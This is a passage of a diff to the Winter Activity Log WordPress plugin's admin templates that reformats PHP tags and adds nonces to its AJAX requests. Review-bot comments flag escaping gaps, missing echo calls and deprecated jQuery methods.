-                $.post('<?php menu_page_url( 'wal_reports', true ); ?>&function=bulk_remove&_wpnonce=<?php echo esc_js(wp_create_nonce( 'winteractivitylog-bulk'));?>', { report_ids: ids }, function(data) {
+                $.post('<?php
+menu_page_url( 'wal_reports', true );
+?>&function=bulk_remove&_wpnonce=<?php
+echo esc_js( wp_create_nonce( 'winteractivitylog-bulk' ) );
+?>', { report_ids: ids }, function(data) {

                     $('img#ajax-indicator-masking').hide();

@@ -168,18 +197,27 @@
                     return $.extend( {}, d, {
                         "page": 'wal_reports',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                     } );
                 }
             },
             "language": {
-                search: "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                searchPlaceholder: "<?php esc_js(__('Enter here filter tag for any column', 'winter-activity-log')); ?>"
+                search: "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                searchPlaceholder: "<?php
+esc_js( __( 'Enter here filter tag for any column', 'winter-activity-log' ) );
+?>"
             },
             "fnDrawCallback": function (oSettings){
                 $('a.delete_button').click(function(){

-                    if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+                    if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
                     {
                        // ajax to remove row
                         $.post($(this).attr('href'), function( [] ) {
@@ -278,11 +316,21 @@
 					'sPrevious': '<i class="fa fa-angle-left"></i>',
 					'sNext': '<i class="fa fa-angle-right"></i>'
 				},
-                'sSearch': "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                "sLengthMenu": "<?php esc_js(__('Show _MENU_ entries', 'winter-activity-log')); ?>",
-                "sInfoEmpty": "<?php esc_js(__('Showing 0 to 0 of 0 entries', 'winter-activity-log')); ?>",
-                "sInfo": "<?php esc_js( __('Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log')); ?>",
-                "sEmptyTable": "<?php esc_js(__('No data available in table', 'winter-activity-log')); ?>",
+                'sSearch': "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                "sLengthMenu": "<?php
+esc_js( __( 'Show _MENU_ entries', 'winter-activity-log' ) );
+?>",
+                "sInfoEmpty": "<?php
+esc_js( __( 'Showing 0 to 0 of 0 entries', 'winter-activity-log' ) );
+?>",
+                "sInfo": "<?php
+esc_js( __( 'Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log' ) );
+?>",
+                "sEmptyTable": "<?php
+esc_js( __( 'No data available in table', 'winter-activity-log' ) );
+?>",
 			},
 			'dom': "<'row'<'col-sm-7 col-md-5'f><'col-sm-5 col-md-6'l>>" + "<'row'<'col-sm-12'tr>>" + "<'row'<'col-sm-5'i><'col-sm-7'p>>"
 		});
--- a/winterlock/application/views/wal_usersessions/index.php
+++ b/winterlock/application/views/wal_usersessions/index.php
@@ -168,7 +168,8 @@
                     return $.extend( {}, d, {
                         "page": 'wal_usersessions',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php echo esc_js(wp_create_nonce( 'winterlock_secure_ajax' ));?>'
                     } );
                 }
             },
--- a/winterlock/application/views/winteractivitylog/index.php
+++ b/winterlock/application/views/winteractivitylog/index.php
@@ -13,7 +13,7 @@
  */
 ?>

-<?php
+<?php
 $def_col_level = 0;
 $def_col_date = 0;
 $def_col_avatar = 0;
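Review bot: the `-<?php` / `+<?php` pair at the top of this hunk shows no visible difference, so the change is trailing whitespace, a line ending, or a byte-order mark. Confirm it is not adding a BOM: any bytes before `<?php` are sent to the browser as output, which in a view file shows up as stray characters and breaks header-sending code later on.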
@@ -21,19 +21,28 @@
 $def_col_ip = 0;
 $def_col_description = 0;
 $def_col_select = 1;
-$def_cols = ['level','date','avatar','user','ip','description'];
-foreach ($def_cols as $def_column){
-    if(sw_wal_log_is_visible_table_column($def_column)){
+$def_cols = [
+    'level',
+    'date',
+    'avatar',
+    'user',
+    'ip',
+    'description'
+];
+foreach ( $def_cols as $def_column ) {
+    if ( sw_wal_log_is_visible_table_column( $def_column ) ) {
         $s_plus = false;
-        foreach ($def_cols as $col) {
-            if($col == $def_column) $s_plus = true;
-            if($s_plus)
-                ${'def_col_'.$col}++;
+        foreach ( $def_cols as $col ) {
+            if ( $col == $def_column ) {
+                $s_plus = true;
+            }
+            if ( $s_plus ) {
+                ${'def_col_' . $col}++;
+            }
         }
         $def_col_select++;
     }
 }
-
 ?>

 <!-- This file should primarily consist of HTML with a little bit of PHP. -->
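Review bot: the nested loop is easier to read now but its intent is still undocumented: for each visible column it increments `$def_col_<name>` for that column and for every column after it in `$def_cols`, which is what turns the zero initialisers above into DataTables column indexes. A one-line comment saying so would help the next reader, and `$col == $def_column` can be `===` since both sides are strings drawn from the same array.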
@@ -41,16 +50,26 @@
 <div class="wrap winterlock_wrap">

 <h1>
-    <?php echo __('Activity log','winter-activity-log'); ?>
-    <?php if(get_option('wal_checkbox_disable_hints', '0') == '0'): ?>
-        <a href="#popup_tutorial" id="popup_tutorial" class="page-title-action pull-right"><i class="fa fa-video-camera"></i>  <?php echo __('Need help? Check Video tutorials!','winter-activity-log'); ?></a>
-    <?php endif; ?>
+    <?php
+echo __( 'Activity log', 'winter-activity-log' );
+?>
+    <?php
+if ( get_option( 'wal_checkbox_disable_hints', '0' ) == '0' ) {
+    ?>
+        <a href="#popup_tutorial" id="popup_tutorial" class="page-title-action pull-right"><i class="fa fa-video-camera"></i>  <?php
+    echo __( 'Need help? Check Video tutorials!', 'winter-activity-log' );
+    ?></a>
+    <?php
+}
+?>
 </h1>

 <div class="winterlock_wrap">
     <div class="panel panel-default">
         <div class="panel-heading flex">
-            <h3 class="panel-title"><?php echo __('Logged data','winter-activity-log'); ?></h3>
+            <h3 class="panel-title"><?php
+echo __( 'Logged data', 'winter-activity-log' );
+?></h3>
         </div>
         <div class="panel-body">
             <!-- Data Table -->
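Review bot: the three `echo __( ... )` calls in this hunk ('Activity log', 'Need help? Check Video tutorials!', 'Logged data') print translated strings into HTML without escaping; use `esc_html__()` (which this same file already uses for 'Tutorials' further down) or `esc_html_e()` so a crafted translation file cannot inject markup. The `<?php` / `?>` tags split across lines are formatter output with no behaviour change, but they make the template harder to read than the original one-liners.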
@@ -60,24 +79,60 @@
                         <thead>
                             <tr>
                                 <th data-priority="1" width="40px">#</th>
-                                <?php if(sw_wal_log_is_visible_table_column('level')):?>
-                                <th data-priority="2" width="40px"><?php echo __('Level', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('date')):?>
-                                    <th data-priority="4"><?php echo __('Date', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
-                                    <th data-priority="2"><?php echo __('Avatar', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('user')):?>
-                                    <th data-priority="2"><?php echo __('User', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('ip')):?>
-                                    <th><?php echo __('IP', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('description')):?>
-                                    <th><?php echo __('Description', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'level' ) ) {
+    ?>
+                                <th data-priority="2" width="40px"><?php
+    echo __( 'Level', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
+                                    <th data-priority="4"><?php
+    echo __( 'Date', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
+                                    <th data-priority="2"><?php
+    echo __( 'Avatar', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
+                                    <th data-priority="2"><?php
+    echo __( 'User', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
+                                    <th><?php
+    echo __( 'IP', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
+                                    <th><?php
+    echo __( 'Description', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
                                 <th data-priority="3" width="100px"></th>
                                 <th width="10px"><input type="checkbox" class="selectAll" name="selectAll" value="all"></th>
                             </tr>
@@ -87,29 +142,69 @@
                         </tbody>
                         <tfoot>
                             <tr>
-                                <th><input type="text" name="filter_id" class="dinamic_par"  placeholder="<?php echo __('Filter #', 'winter-activity-log'); ?>" /></th>
-                                <?php if(sw_wal_log_is_visible_table_column('level')):?>
-                                <th><input type="text" name="filter_level" class="dinamic_par" placeholder="<?php echo __('Filter Level', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('date')):?>
-                                <th><input type="text" id="filter_date" name="filter_date" class="dinamic_par" placeholder="<?php echo __('Filter Date From', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
+                                <th><input type="text" name="filter_id" class="dinamic_par"  placeholder="<?php
+echo __( 'Filter #', 'winter-activity-log' );
+?>" /></th>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'level' ) ) {
+    ?>
+                                <th><input type="text" name="filter_level" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter Level', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
+                                <th><input type="text" id="filter_date" name="filter_date" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter Date From', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
                                 <th></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('user')):?>
-                                <th><input type="text" id="filter_user" name="filter_user" value="<?php echo esc_attr(wmvc_show_data('filter_user', $_GET, '')); ?>" class="dinamic_par" placeholder="<?php echo __('Filter User', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('ip')):?>
-                                <th><input type="text" name="filter_ip" class="dinamic_par" placeholder="<?php echo __('Filter IP', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('description')):?>
-                                <th><input type="text" name="filter_description" class="dinamic_par" placeholder="<?php echo __('Filter Description', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
+                                <th><input type="text" id="filter_user" name="filter_user" value="<?php
+    echo esc_attr( wmvc_show_data( 'filter_user', $_GET, '' ) );
+    ?>" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter User', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
+                                <th><input type="text" name="filter_ip" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter IP', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
+                                <th><input type="text" name="filter_description" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter Description', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
                                 <th colspan="2">
                                     <div class="winterlock_save_search_filter">
                                         <div class="winterlock_save_search_filter_btn">
-                                            <a href="#" class="btn btn_save"><?php echo __('Save', 'winter-activity-log'); ?></a>
+                                            <a href="#" class="btn btn_save"><?php
+echo __( 'Save', 'winter-activity-log' );
+?></a>
                                             <a href="#" class="btn-toggle"><i class="fa fa-angle-down"></i></a>
                                         </div>
                                         <ul class="winterlock_list_filters">
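Review bot: in this hunk the `placeholder="..."` attributes are filled with plain `echo __( ... )` while the `value` attribute for filter_user correctly goes through `esc_attr()`; a placeholder is attribute context too, so `esc_attr__( 'Filter Level', 'winter-activity-log' )` and its siblings should be used for consistency and to keep a quote in a translation from breaking out of the attribute.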
@@ -123,38 +218,47 @@
             </div>

             <div class="form-inline">
-                <div class="checkbox  <?php if ( !winteractivitylog()->is_plan_or_trial('standard') ) echo 'wal-pro'; ?>">
+                <div class="checkbox  <?php
+if ( !winteractivitylog()->is_plan_or_trial( 'standard' ) ) {
+    echo 'wal-pro';
+}
+?>">
                     <label>
-                        <input id="wal_live_monitoring" type="checkbox"> <?php echo __('Live monitoring enable (autorefresh each 10 sec)', 'winter-activity-log'); ?>
+                        <input id="wal_live_monitoring" type="checkbox"> <?php
+echo __( 'Live monitoring enable (autorefresh each 10 sec)', 'winter-activity-log' );
+?>
                     </label>
                 </div>

                 <div class="footer-btns">
-                    <a href="<?php echo admin_url("admin.php?page=wal_reports&function=report_edit"); ?>" class="btn btn-warning pull-right"><i class="fa fa-download"></i>  <?php echo __('Export/Generate Report','winter-activity-log')?></a>
-                    <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php echo __('Bulk remove','winter-activity-log')?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
-                    <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php echo __('Clear all filters','winter-activity-log')?></a>
+                    <a href="<?php
+echo admin_url( "admin.php?page=wal_reports&function=report_edit" );
+?>" class="btn btn-warning pull-right"><i class="fa fa-download"></i>  <?php
+echo __( 'Export/Generate Report', 'winter-activity-log' );
+?></a>
+                    <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php
+echo __( 'Bulk remove', 'winter-activity-log' );
+?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
+                    <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php
+echo __( 'Clear all filters', 'winter-activity-log' );
+?></a>
                 </div>
             </div>
         </div>
     </div>

     <?php
-    if ( winteractivitylog()->is__premium_only() ) {
-    if ( !winteractivitylog()->is_plan_or_trial('standard') ){ ?>
-        <div class="alert alert-danger" role="alert"><?php echo __('Min. standard package is required for live monitoring feature', 'winter-activity-log'); ?></div>
-    <?php }} ?>
+?>

 </div>
 </div>


-<?php
-
-wp_enqueue_style('winter-activity-log_basic_wrapper');
+<?php
+wp_enqueue_style( 'winter-activity-log_basic_wrapper' );
 wp_enqueue_script( 'datatables' );
 wp_enqueue_script( 'dataTables-responsive' );
 wp_enqueue_script( 'dataTables-select' );
-
 wp_enqueue_style( 'dataTables-select' );
 ?>

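Review bot: removing the premium-only alert leaves an empty PHP block behind (the unchanged `<?php` followed by the added `?>`), which should be deleted rather than kept. Dropping the `is__premium_only()` / `is_plan_or_trial( 'standard' )` notice is also a functional change unrelated to the authorization fix and would be clearer as its own commit.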
@@ -178,12 +282,18 @@
          //debug: true
     });

-    <?php if(sw_wal_log_is_visible_table_column('date')):?>
+    <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
     $("#filter_date").on("dp.change", function (e) {
         $("#filter_date").trigger('change');
-        table.columns(<?php $def_col_date;?>).search( $('#filter_date').val() ).draw();
+        table.columns(<?php
+    $def_col_date;
+    ?>).search( $('#filter_date').val() ).draw();
     });
-    <?php endif;?>
+    <?php
+}
+?>

     /* winterlock_save_search_filter */
     function generate_json_filter()
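Review bot: `table.columns(<?php $def_col_date; ?>)` still emits nothing, because the statement evaluates `$def_col_date` without echoing it, so `.search()` is applied to every column rather than the date column. It should be `<?php echo intval( $def_col_date ); ?>`, matching how `$def_col_user` is emitted elsewhere in this file.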
@@ -242,9 +352,14 @@
             "page": 'winteractivitylog',
             'function': 'filter_get',
             "action": 'winter_activity_log_action',
+             "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
         };

-        $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
+        $.post('<?php
+echo esc_url( admin_url( 'admin-ajax.php' ) );
+?>', data,
         function(data){
             var html ='';
             $('.winterlock_save_search_filter .winterlock_list_filters').html(html);
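Review bot: the nonce added to the filter_get request is correct, but it is the first of four places in this file (filter_get, filter_remove, filter_save, datatable) that each inline `wp_create_nonce( 'winterlock_secure_ajax' )` inside a JS object literal; emitting it once into a JS variable (or localizing it with wp_localize_script) gives one place to refresh it and keeps PHP tags out of the JS. The field name `winterlock_secure` has to match exactly what the controller verifies, so a shared constant on the PHP side would guard against drift.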
@@ -282,7 +397,9 @@

                 setTimeout(function(){jQuery('.dinamic_par[name="sw_log_search"]').trigger('change');},1500);

-                sw_log_notify('<?php echo __('Loaded filter', 'winter-activity-log'); ?> '+$(this).contents()[0].textContent);
+                sw_log_notify('<?php
+echo __( 'Loaded filter', 'winter-activity-log' );
+?> '+$(this).contents()[0].textContent);
                 $(this).closest('.winterlock_save_search_filter').removeClass('show');
         })

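Review bot: `sw_log_notify('<?php echo __( 'Loaded filter', ... ); ?> ' + ...)` drops a translated string straight into a single-quoted JS literal; a translation containing an apostrophe breaks the script, and a hostile one can inject code. Wrap it in `esc_js()` the way the `sSearch` labels are; the same applies to 'Removing filter', 'Removed filter', 'Saved filter' and the `$.confirm` title and label strings in the later hunks.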
@@ -295,14 +412,23 @@
                     'function': 'filter_remove',
                     "action": 'winter_activity_log_action',
                     "filter_id": $(this).attr('data-fielderid') || '',
+                     "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                 };
-                sw_log_notify('<?php echo __('Removing filter', 'winter-activity-log'); ?> '+title, 'loading');
-
-                $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
+                sw_log_notify('<?php
+echo __( 'Removing filter', 'winter-activity-log' );
+?> '+title, 'loading');
+
+                $.post('<?php
+echo esc_url( admin_url( 'admin-ajax.php' ) );
+?>', data,
                 function(data){

                 }, "json").success(function(){
-                    sw_log_notify('<?php echo __('Removed filter', 'winter-activity-log'); ?> '+title);
+                    sw_log_notify('<?php
+echo __( 'Removed filter', 'winter-activity-log' );
+?> '+title);
                     reload_filters();
                 });
         })
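Review bot: `.success(...)` chained on the `$.post(...)` call in this hunk was removed from jqXHR in jQuery 3.0 and only keeps working while jQuery Migrate is loaded, so the 'Removed filter' notice and `reload_filters()` depend on a compatibility shim; use `.done(...)`. The empty `function(data){ }` success callback can be dropped at the same time.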
@@ -318,7 +444,9 @@
              is_empty = false;

         if(is_empty) {
-            sw_log_notify('<?php echo __('Fitlers are empty', 'winter-activity-log'); ?>', 'error');
+            sw_log_notify('<?php
+echo __( 'Fitlers are empty', 'winter-activity-log' );
+?>', 'error');
             return false;
         }

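Review bot: the translatable string 'Fitlers are empty' is misspelled ('Filters'); since it is a msgid, fixing it also means updating the .pot/.po entries, which is a good reason to do it while this line is already being touched.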
@@ -326,17 +454,25 @@
         $.confirm({
             boxWidth: '400px',
             useBootstrap: false,
-            title: '<?php echo __('Save', 'winter-activity-log'); ?>',
+            title: '<?php
+echo __( 'Save', 'winter-activity-log' );
+?>',
             content: '' +
             '<form action="" class="winterlock_list_filters_form formName">' +
             '<div class="form-group">' +
-            '<label><?php echo __('Filter name', 'winter-activity-log'); ?></label>' +
-            '<input type="text" placeholder="<?php echo __('Filter name', 'winter-activity-log'); ?>" class="filter_name form-control" required />' +
+            '<label><?php
+echo __( 'Filter name', 'winter-activity-log' );
+?></label>' +
+            '<input type="text" placeholder="<?php
+echo __( 'Filter name', 'winter-activity-log' );
+?>" class="filter_name form-control" required />' +
             '</div>' +
             '</form>',
             buttons: {
                 formSubmit: {
-                    text: '<?php echo __('Save', 'winter-activity-log'); ?>',
+                    text: '<?php
+echo __( 'Save', 'winter-activity-log' );
+?>',
                     btnClass: 'btn-blue',
                     action: function () {
                         var filter_name = this.$content.find('.filter_name').val();
@@ -350,20 +486,29 @@
                             'function': 'filter_save',
                             "action": 'winter_activity_log_action',
                             "filter_name": filter_name,
-                            "filter_param": generate_json_filter()
+                            "filter_param": generate_json_filter(),
+                             "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                         };

-                        $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
+                        $.post('<?php
+echo esc_url( admin_url( 'admin-ajax.php' ) );
+?>', data,
                         function(data){
                         }, "json").success(function(){
-                            sw_log_notify('<?php echo __('Saved filter', 'winter-activity-log'); ?> '+filter_name);
+                            sw_log_notify('<?php
+echo __( 'Saved filter', 'winter-activity-log' );
+?> '+filter_name);
                             reload_filters();
                         } );

                     }
                 },
                 cancel: {
-                    text: '<?php echo __('Cancel', 'winter-activity-log'); ?>',
+                    text: '<?php
+echo __( 'Cancel', 'winter-activity-log' );
+?>',
                     action: function () {
                     }
                 }
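Review bot: the added `"winterlock_secure"` entry is indented one space deeper than its siblings (`"filter_name"`, `"filter_param"`), as it is in the filter_get and filter_remove objects above; align it. This call site also uses the jqXHR `.success(...)` method, so it should move to `.done(...)` together with the others.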
@@ -433,14 +578,18 @@

         if(count == 0)
         {
-            alert('<?php echo esc_attr__('Please select listings to remove', 'winter-activity-log'); ?>');
+            alert('<?php
+echo esc_attr__( 'Please select listings to remove', 'winter-activity-log' );
+?>');
             load_indicator_opc.addClass('hidden_opacity');
             return false;
         }
         else
         {

-            if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+            if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
             {
                 $('img#ajax-indicator-masking').show();

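Review bot: both dialog strings in this hunk are handled wrongly: `alert('<?php echo esc_attr__( ... ); ?>')` uses HTML-attribute escaping inside a JS string literal (it should be `echo esc_js( __( ... ) )`), and `confirm('<?php esc_js( __( 'Are you sure?', ... ) ); ?>')` has no `echo`, so the confirm box opens with an empty prompt. The same echo-less `confirm` appears again in the `delete_button` handler below.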
@@ -448,7 +597,11 @@
                 var ids = table.rows( { selected: true } ).data().pluck( 'idlog' ).toArray();

                 // ajax to remove rows
-                $.post('<?php menu_page_url( 'winteractivitylog', true ); ?>&function=bulk_remove&_wpnonce=<?php echo esc_js(wp_create_nonce( 'winteractivitylog-bulk'));?>', { log_ids: ids }, function(data) {
+                $.post('<?php
+menu_page_url( 'winteractivitylog', true );
+?>&function=bulk_remove&_wpnonce=<?php
+echo esc_js( wp_create_nonce( 'winteractivitylog-bulk' ) );
+?>', { log_ids: ids }, function(data) {

                     $('img#ajax-indicator-masking').hide();

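Review bot: bulk_remove keeps its own `_wpnonce=` query-string nonce ('winteractivitylog-bulk') rather than the new `winterlock_secure` POST field, so it sits outside the `winterlock_secure_ajax` scheme this patch introduces. That is acceptable only if the bulk_remove handler verifies that nonce and checks the caller's capability the same way the AJAX methods now do, which this diff does not show; worth confirming in the controller.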
@@ -494,15 +647,22 @@
                     return $.extend( {}, d, {
                         "page": 'winteractivitylog',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>',
                     } );


                 }
             },
             "language": {
-                search: "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                searchPlaceholder: "<?php esc_js(__('Enter here filter tag for any column', 'winter-activity-log')); ?>"
+                search: "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                searchPlaceholder: "<?php
+esc_js( __( 'Enter here filter tag for any column', 'winter-activity-log' ) );
+?>"
             },
             "initComplete": function(settings, json) {
             },
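Review bot: the nonce entry in the datatable `data` callback ends with a trailing comma (`?>',` immediately before `} );`), unlike the wal_usersessions version of the same change; it is legal in current browsers but inconsistent with the rest of the file. Separately, `search:` and `searchPlaceholder:` call `esc_js( __( ... ) )` without `echo`, so the search box is rendered with empty strings.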
@@ -511,16 +671,24 @@
 //                if(sw_log_s_table_load_counter == 0)
                 {
                     sw_log_s_table_load_counter++;
-                    <?php if(sw_wal_log_is_visible_table_column('user')):?>
+                    <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
                     if($('#filter_user').val() != '')
-                    setTimeout(function(){ table.columns(<?php echo intval($def_col_user);?>).search( $('#filter_user').val() ).draw(); }, 1000);
-                    <?php endif;?>
+                    setTimeout(function(){ table.columns(<?php
+    echo intval( $def_col_user );
+    ?>).search( $('#filter_user').val() ).draw(); }, 1000);
+                    <?php
+}
+?>

                 }

                 $('a.delete_button').click(function(){

-                    if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+                    if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
                     {
                        // ajax to remove row
                         $.post($(this).attr('href'), function( [] ) {
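Review bot: the unchanged context line `$.post($(this).attr('href'), function( [] ) {` declares the callback parameter as an empty array-destructuring pattern, so the callback throws a TypeError whenever the response is parsed to a non-iterable value such as a JSON object; give the parameter a name (`function(data)`) even if the body ignores it.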
@@ -562,24 +730,48 @@
             },
             'columns': [
                 { data: "idlog" },
-                <?php if(sw_wal_log_is_visible_table_column('level')):?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'level' ) ) {
+    ?>
                     { data: "level" },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('date')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
                     { data: "date"   },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
                     { data: "avatar"  },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('user')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
                     { data: "user_info"  },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('ip')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
                     { data: "ip"   },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('description')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
                     { data: "description"},
-                <?php endif;?>
+                <?php
+}
+?>

                 { data: "edit"    },
                 { data: "checkbox"  }
@@ -596,48 +788,76 @@
             },
             order: [[ 0, 'desc' ]],
             columnDefs: [
-                            <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
                             {
-                                targets: <?php echo intval($def_col_avatar);?>,
+                                targets: <?php
+    echo intval( $def_col_avatar );
+    ?>,
                                 orderable: false
                             },
-                            <?php endif;?>
+                            <?php
+}
+?>
                             {
                                 //className: 'control',
                                 className: 'details-control',
                                 orderable: true,
                                 targets:   0
                             },
-                            <?php if(sw_wal_log_is_visible_table_column('user')):?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
                             {
                                 //className: 'control',
                                 //className: 'details-control',
                                 orderable: false,
-                                targets:   <?php echo intval($def_col_user);?>
+                                targets:   <?php
+    echo intval( $def_col_user );
+    ?>
                             },
-                            <?php endif;?>
-                            <?php if(sw_wal_log_is_visible_table_column('ip')):?>
+                            <?php
+}
+?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
                             {
-                                targets: <?php echo intval($def_col_ip);?>,
+                                targets: <?php
+    echo intval( $def_col_ip );
+    ?>,
                                 orderable: false,
                                 defaultContent: '2',
                             },
-                            <?php endif;?>
-                            <?php if(sw_wal_log_is_visible_table_column('description')):?>
+                            <?php
+}
+?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
                             {
-                                targets: <?php echo intval($def_col_description);?>,
+                                targets: <?php
+    echo intval( $def_col_description );
+    ?>,
                                 orderable: false
                             },
-                            <?php endif;?>
+                            <?php
+}
+?>
                             {
-                                targets: <?php echo intval($def_col_select);?>,
+                                targets: <?php
+echo intval( $def_col_select );
+?>,
                                 orderable: false
                             },
                             {
                                 className: 'select-checkbox',
                                 orderable: false,
                                 defaultContent: '',
-                                targets:   <?php echo intval($def_col_select+1);?>
+                                targets:   <?php
+echo intval( $def_col_select + 1 );
+?>
                             }
             ],
             select: {
@@ -649,11 +869,21 @@
 					'sPrevious': '<i class="fa fa-angle-left"></i>',
 					'sNext': '<i class="fa fa-angle-right"></i>'
 				},
-                'sSearch': "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                "sLengthMenu": "<?php esc_js(__('Show _MENU_ entries', 'winter-activity-log')); ?>",
-                "sInfoEmpty": "<?php esc_js(__('Showing 0 to 0 of 0 entries', 'winter-activity-log')); ?>",
